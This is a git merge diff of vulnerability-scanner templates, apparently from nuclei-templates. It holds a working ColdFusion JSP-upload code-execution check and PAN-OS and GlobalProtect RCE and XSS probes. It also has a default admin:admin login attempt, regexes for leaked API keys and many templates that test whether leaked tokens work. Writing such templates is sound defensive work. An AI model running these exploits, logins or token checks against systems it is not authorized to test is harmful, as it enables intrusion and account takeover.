Merge branch 'projectdiscovery:master' into master
commit
f5b7612121
|
@ -8,11 +8,11 @@ info:
|
|||
- https://www.exploit-db.com/exploits/43342
|
||||
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||
severity: critical
|
||||
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2017-15944
|
||||
tags: cve,cve2017,rce,vpn,panos,globalprotect
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,9 +24,9 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "@start@Success@end@"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -2,16 +2,16 @@ id: CVE-2018-10141
|
|||
|
||||
info:
|
||||
name: GlobalProtect Login page XSS
|
||||
severity: medium
|
||||
author: dhiyaneshDk
|
||||
description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML.
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141
|
||||
tags: globalprotect,xss,cve,cve2018,vpn
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-10141
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2018,panos,vpn,globalprotect,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -21,14 +21,14 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'var valueUser = "j";-alert(1)-"x";'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,65 @@
|
|||
id: CVE-2018-15961
|
||||
|
||||
info:
|
||||
name: Adobe ColdFusion Unrestricted file upload RCE
|
||||
author: SkyLark-Lab,ImNightmaree
|
||||
severity: critical
|
||||
description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-15961
|
||||
- https://github.com/xbufu/CVE-2018-15961
|
||||
tags: cve,cve2018,adobe,rce,coldfusion,fileupload
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-15961
|
||||
cwe-id: CWE-434
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
|
||||
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%@ page import="java.security.MessageDigest"%>
|
||||
<%
|
||||
String cve = "CVE-2018-15961";
|
||||
MessageDigest alg = MessageDigest.getInstance("MD5");
|
||||
alg.reset();
|
||||
alg.update(cve.getBytes());
|
||||
byte[] digest = alg.digest();
|
||||
StringBuffer hashedpasswd = new StringBuffer();
|
||||
String hx;
|
||||
for (int i=0;i<digest.length;i++){
|
||||
hx = Integer.toHexString(0xFF & digest[i]);
|
||||
if(hx.length() == 1){hx = "0" + hx;}
|
||||
hashedpasswd.append(hx);
|
||||
}
|
||||
out.println(hashedpasswd.toString());
|
||||
%>
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="path"
|
||||
|
||||
{{randstr}}.jsp
|
||||
-----------------------------24464570528145--
|
||||
|
||||
- |
|
||||
GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Default Login of admin:admin on Palo Alto Networks PAN-OS application.
|
||||
reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
|
||||
tags: paloalto,panos,default-login
|
||||
tags: panos,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -17,19 +17,19 @@ requests:
|
|||
|
||||
user={{username}}&passwd={{password}}&challengePwd=&ok=Login
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Set-Cookie: PHPSESSID"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: PaloAlto Networks GlobalProtect Panel
|
||||
author: organiccrap
|
||||
severity: info
|
||||
tags: panel
|
||||
tags: panel,panos
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -12,6 +12,7 @@ requests:
|
|||
- "{{BaseURL}}/global-protect/login.esp"
|
||||
- "{{BaseURL}}/sslmgr"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: credentials-disclosure
|
||||
id: credentials-disclosure-file
|
||||
|
||||
# Extract secrets regex like api keys, password, token, etc ... for different services
|
||||
# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: google-api-key
|
||||
id: google-api-key-file
|
||||
|
||||
info:
|
||||
name: Google API key
|
||||
|
@ -13,4 +13,4 @@ file:
|
|||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "AIza[0-9A-Za-z\\-_]{35}"
|
||||
- "AIza[0-9A-Za-z\\-_]{35}"
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: sendgrid-api-key
|
||||
id: sendgrid-api-key-file
|
||||
|
||||
info:
|
||||
name: Sendgrid API Key
|
||||
|
@ -13,4 +13,4 @@ file:
|
|||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}"
|
||||
- "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}"
|
||||
|
|
|
@ -1,30 +0,0 @@
|
|||
id: phpmyadmin-setup
|
||||
|
||||
info:
|
||||
name: Publicly Accessible Phpmyadmin Setup
|
||||
author: sheikhrishad
|
||||
severity: medium
|
||||
tags: misc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "You want to configure phpMyAdmin using web interface"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,17 +1,33 @@
|
|||
id: phpmyadmin-setup
|
||||
|
||||
info:
|
||||
name: phpMyAdmin setup page
|
||||
author: thevillagehacker
|
||||
name: Publicly Accessible Phpmyadmin Setup
|
||||
author: sheikhrishad,thevillagehacker
|
||||
severity: medium
|
||||
tags: phpmyadmin
|
||||
reference: https://hackerone.com/reports/297339
|
||||
tags: phpmyadmin,misconfig
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/phpmyadmin/setup/index.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "You want to configure phpMyAdmin using web interface"
|
||||
- "<title>phpMyAdmin setup</title>"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/phpmyadmin/index.php?db=information_schema"
|
||||
- "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -21,6 +22,7 @@ requests:
|
|||
- "var db = 'information_schema';"
|
||||
- "var opendb_url = 'db_structure.php';"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -145,6 +145,11 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "__schema"
|
||||
|
|
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "error"
|
||||
negative: true
|
||||
- '"username":'
|
||||
- '"id":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-apigee-edge
|
|||
info:
|
||||
name: Apigee Edge API Test
|
||||
author: dwisiswant0
|
||||
reference: https://apidocs.apigee.com/apis
|
||||
severity: info
|
||||
reference: https://apidocs.apigee.com/apis
|
||||
tags: token-spray,apigee
|
||||
|
||||
self-contained: true
|
||||
|
@ -24,5 +24,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "fault"
|
||||
negative: true
|
||||
- '"uuid":'
|
||||
- '"name":'
|
||||
condition: and
|
|
@ -20,5 +20,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Authorization required"
|
||||
negative: true
|
||||
- '"roleId":'
|
||||
- '"created":'
|
||||
condition: and
|
|
@ -16,7 +16,10 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 401
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'data:'
|
||||
- 'email'
|
||||
- 'name'
|
||||
condition: and
|
|
@ -19,7 +19,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Invalid API-key"
|
||||
- "key format invalid"
|
||||
condition: or
|
||||
negative: true
|
||||
- '"id":'
|
||||
- '"price":'
|
||||
- '"quoteQty":'
|
||||
condition: and
|
|
@ -16,6 +16,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'INVALID_ARG_ACCESS_TOKEN'
|
||||
- '"long_url":'
|
||||
- '"created_at":'
|
||||
condition: and
|
|
@ -16,7 +16,10 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"graphql_id":'
|
||||
- '"email":'
|
||||
condition: and
|
|
@ -14,7 +14,10 @@ requests:
|
|||
- "https://api.buttercms.com/v2/posts/?auth_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"meta":'
|
||||
- '"data":'
|
||||
- '"url":'
|
||||
condition: and
|
|
@ -16,6 +16,10 @@ requests:
|
|||
X-Token: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"id":'
|
||||
- '"email":'
|
||||
condition: and
|
|
@ -14,6 +14,9 @@ requests:
|
|||
- "https://circleci.com/api/v1.1/me?circle-token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"admin"'
|
||||
- '"login"'
|
||||
condition: and
|
|
@ -16,6 +16,10 @@ requests:
|
|||
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"stat":'
|
||||
- '"formats":'
|
||||
- '"default_format":'
|
||||
condition: and
|
||||
|
|
|
@ -3,8 +3,8 @@ id: api-deviantart
|
|||
info:
|
||||
name: DeviantArt API Test
|
||||
author: zzeitlin
|
||||
reference: https://www.deviantart.com/developers/authentication
|
||||
severity: info
|
||||
reference: https://www.deviantart.com/developers/authentication
|
||||
tags: token-spray,deviantart
|
||||
|
||||
self-contained: true
|
||||
|
@ -18,5 +18,4 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"status":"error"'
|
||||
negative: true
|
||||
- '"status" : "success"'
|
|
@ -16,6 +16,9 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"account_id":'
|
||||
- '"email":'
|
||||
condition: and
|
|
@ -16,6 +16,10 @@ requests:
|
|||
- "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'success'
|
||||
- 'apikey'
|
||||
- 'action'
|
||||
condition: and
|
|
@ -24,5 +24,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "No active API token"
|
||||
negative: true
|
||||
- '"access_token":'
|
||||
- '"scopes":'
|
||||
condition: and
|
|
@ -19,4 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'login'
|
||||
- '"login":'
|
||||
- '"avatar_url":'
|
||||
condition: and
|
|
@ -17,10 +17,9 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
condition: or
|
||||
status:
|
||||
- 200
|
||||
- 201
|
||||
- 202
|
||||
- 206
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"created_at":'
|
||||
- '"git_url":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-hubspot
|
|||
info:
|
||||
name: HubSpot API Test
|
||||
author: zzeitlin
|
||||
reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners
|
||||
severity: info
|
||||
reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners
|
||||
tags: token-spray,hubspot
|
||||
|
||||
self-contained: true
|
||||
|
@ -12,11 +12,20 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}"
|
||||
- "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}"
|
||||
- "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
- '"portalId":'
|
||||
- '"ownerId":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"metaData":'
|
||||
- '"portalId":'
|
||||
condition: and
|
|
@ -11,9 +11,13 @@ self-contained: true
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}"
|
||||
- "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"access_token":'
|
||||
- '"name":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-ipstack
|
|||
info:
|
||||
name: IPStack API Test
|
||||
author: zzeitlin
|
||||
reference: https://ipstack.com/documentation
|
||||
severity: info
|
||||
reference: https://ipstack.com/documentation
|
||||
tags: token-spray,ipstack
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,8 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'invalid_access_key'
|
||||
- '"ip":'
|
||||
- '"hostname":'
|
||||
- '"type":'
|
||||
condition: and
|
|
@ -3,22 +3,22 @@ id: api-iterable
|
|||
info:
|
||||
name: Iterable API Test
|
||||
author: zzeitlin
|
||||
reference: https://api.iterable.com/api/docs
|
||||
severity: info
|
||||
reference: https://api.iterable.com/api/docs
|
||||
tags: token-spray,iterable
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty"
|
||||
- "https://api.iterable.com/api/catalogs"
|
||||
headers:
|
||||
Api_Key: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'BadApiKey'
|
||||
- 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve
|
||||
- '"name":'
|
||||
- '"catalogNames":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-jumpcloud
|
|||
info:
|
||||
name: JumpCloud API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key
|
||||
severity: info
|
||||
reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key
|
||||
tags: token-spray,jumpcloud
|
||||
|
||||
self-contained: true
|
||||
|
@ -18,6 +18,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'Unauthorized'
|
||||
- '"_id":'
|
||||
- '"agentServer":'
|
||||
condition: and
|
|
@ -21,5 +21,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Credentials are required"
|
||||
negative: true
|
||||
- '"input":'
|
||||
- '"connectorType":'
|
||||
condition: and
|
|
@ -21,6 +21,8 @@ requests:
|
|||
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- "serviceErrorCode"
|
||||
- '"id":'
|
||||
- '"firstName":'
|
||||
- '"localized":'
|
||||
condition: and
|
|
@ -3,19 +3,23 @@ id: api-lokalise
|
|||
info:
|
||||
name: Lokalise API Test
|
||||
author: zzeitlin
|
||||
reference: https://app.lokalise.com/api2docs/curl/#resource-projects
|
||||
severity: info
|
||||
reference: https://app.lokalise.com/api2docs/curl/#resource-projects
|
||||
tags: token-spray,lokalise
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.lokalise.com/api2/projects/"
|
||||
- "https://api.lokalise.com/api2/teams"
|
||||
headers:
|
||||
X-Api-Token: "{{token}}"
|
||||
x-api-Token: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"teams":'
|
||||
- '"team_id":'
|
||||
- '"name":'
|
||||
condition: and
|
|
@ -3,15 +3,15 @@ id: api-loqate
|
|||
info:
|
||||
name: Loqate API Test
|
||||
author: zzeitlin
|
||||
reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/
|
||||
severity: info
|
||||
reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/
|
||||
tags: token-spray,loqate
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"
|
||||
- "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"
|
||||
|
||||
matchers:
|
||||
- type: word
|
|
@ -3,8 +3,8 @@ id: api-mailchimp
|
|||
info:
|
||||
name: Mailchimp API Test
|
||||
author: zzeitlin
|
||||
reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration
|
||||
severity: info
|
||||
reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration
|
||||
tags: token-spray,mailchimp
|
||||
|
||||
self-contained: true
|
|
@ -3,8 +3,8 @@ id: api-mailgun
|
|||
info:
|
||||
name: Mailgun API Test
|
||||
author: zzeitlin
|
||||
reference: https://documentation.mailgun.com/en/latest/api-intro.html
|
||||
severity: info
|
||||
reference: https://documentation.mailgun.com/en/latest/api-intro.html
|
||||
tags: token-spray,mailgun
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,10 @@ requests:
|
|||
Authorization: Basic {{base64('api:' + token)}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"total_count":'
|
||||
- '"items":'
|
||||
- '"created_at":'
|
||||
condition: and
|
|
@ -14,7 +14,10 @@ requests:
|
|||
- "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'type'
|
||||
- 'query'
|
||||
- 'features'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-nerdgraph
|
|||
info:
|
||||
name: New Relic NerdGraph API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/
|
||||
severity: info
|
||||
reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/
|
||||
tags: token-spray,newrelic,nerdgraph
|
||||
|
||||
self-contained: true
|
|
@ -3,8 +3,8 @@ id: api-netlify
|
|||
info:
|
||||
name: Netlify API Test
|
||||
author: dwisiswant0
|
||||
reference: https://docs.netlify.com/api/get-started/
|
||||
severity: info
|
||||
reference: https://docs.netlify.com/api/get-started/
|
||||
tags: token-spray,netlify
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,10 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"premium":'
|
||||
- '"claimed":'
|
||||
condition: and
|
|
@ -3,9 +3,9 @@ id: api-npm
|
|||
info:
|
||||
name: NPM API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.npmjs.com/creating-and-viewing-access-tokens
|
||||
severity: info
|
||||
tags: token-spray,node,npm,package,manager
|
||||
reference: https://docs.npmjs.com/creating-and-viewing-access-tokens
|
||||
tags: token-spray,node,npm
|
||||
|
||||
self-contained: true
|
||||
requests:
|
|
@ -3,21 +3,25 @@ id: api-onelogin
|
|||
info:
|
||||
name: OneLogin API Test
|
||||
author: dwisiswant0
|
||||
reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview
|
||||
severity: info
|
||||
reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview
|
||||
tags: token-spray,onelogin
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.us.onelogin.com/api/2/users?fields=id"
|
||||
- "https://api.eu.onelogin.com/api/2/users?fields=id"
|
||||
- "https://api.us.onelogin.com/api/2/apps"
|
||||
- "https://api.eu.onelogin.com/api/2/apps"
|
||||
headers:
|
||||
Authorization: Bearer {{token}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"connector_id":'
|
||||
- '"auth_method":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-openweather
|
|||
info:
|
||||
name: OpenWeather API Test
|
||||
author: zzeitlin
|
||||
reference: https://openweathermap.org/current
|
||||
severity: info
|
||||
reference: https://openweathermap.org/current
|
||||
tags: token-spray,weather,openweather
|
||||
|
||||
self-contained: true
|
||||
|
@ -14,6 +14,10 @@ requests:
|
|||
- "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"coord":'
|
||||
- '"weather":'
|
||||
- '"base":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-optimizely
|
|||
info:
|
||||
name: Optimizely API Test
|
||||
author: dwisiswant0
|
||||
reference: https://library.optimizely.com/docs/api/app/v2/index.html
|
||||
severity: info
|
||||
reference: https://library.optimizely.com/docs/api/app/v2/index.html
|
||||
tags: token-spray,optimizely
|
||||
|
||||
self-contained: true
|
||||
|
@ -24,4 +24,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "account_id"
|
||||
- '"account_id":'
|
||||
- '"confidence_threshold":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-pagerduty
|
|||
info:
|
||||
name: Pagerduty API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.pagerduty.com/api-reference
|
||||
severity: info
|
||||
reference: https://developer.pagerduty.com/api-reference
|
||||
tags: token-spray,pagerduty
|
||||
|
||||
self-contained: true
|
||||
|
@ -17,7 +17,9 @@ requests:
|
|||
Authorization: Token token={{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"schedules":'
|
||||
- '"id":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-pendo
|
|||
info:
|
||||
name: Pendo API Test
|
||||
author: zzeitlin
|
||||
reference: https://help.pendo.io/resources/support-library/api/index.html
|
||||
severity: info
|
||||
reference: https://help.pendo.io/resources/support-library/api/index.html
|
||||
tags: token-spray,pendo
|
||||
|
||||
self-contained: true
|
||||
|
@ -12,13 +12,14 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "https://app.pendo.io/api/v1/feature"
|
||||
- "https://app.pendo.io/api/v1/metadata/schema/account"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
X-Pendo-Integration-Key: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 403
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"createdByUser":'
|
||||
- '"id":'
|
||||
condition: and
|
|
@ -21,3 +21,4 @@ requests:
|
|||
negative: true
|
||||
words:
|
||||
- 'invalid_authentication'
|
||||
- 'unauthenticated'
|
|
@ -3,20 +3,24 @@ id: api-postmark
|
|||
info:
|
||||
name: PostMark API Test
|
||||
author: zzeitlin
|
||||
reference: https://postmarkapp.com/developer/api/overview
|
||||
severity: info
|
||||
reference: https://postmarkapp.com/developer/api/overview
|
||||
tags: token-spray,postmark
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.postmarkapp.com/stats/outbound"
|
||||
- "https://api.postmarkapp.com/server"
|
||||
headers:
|
||||
Accept: application/json
|
||||
X-Postmark-Server-Token: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
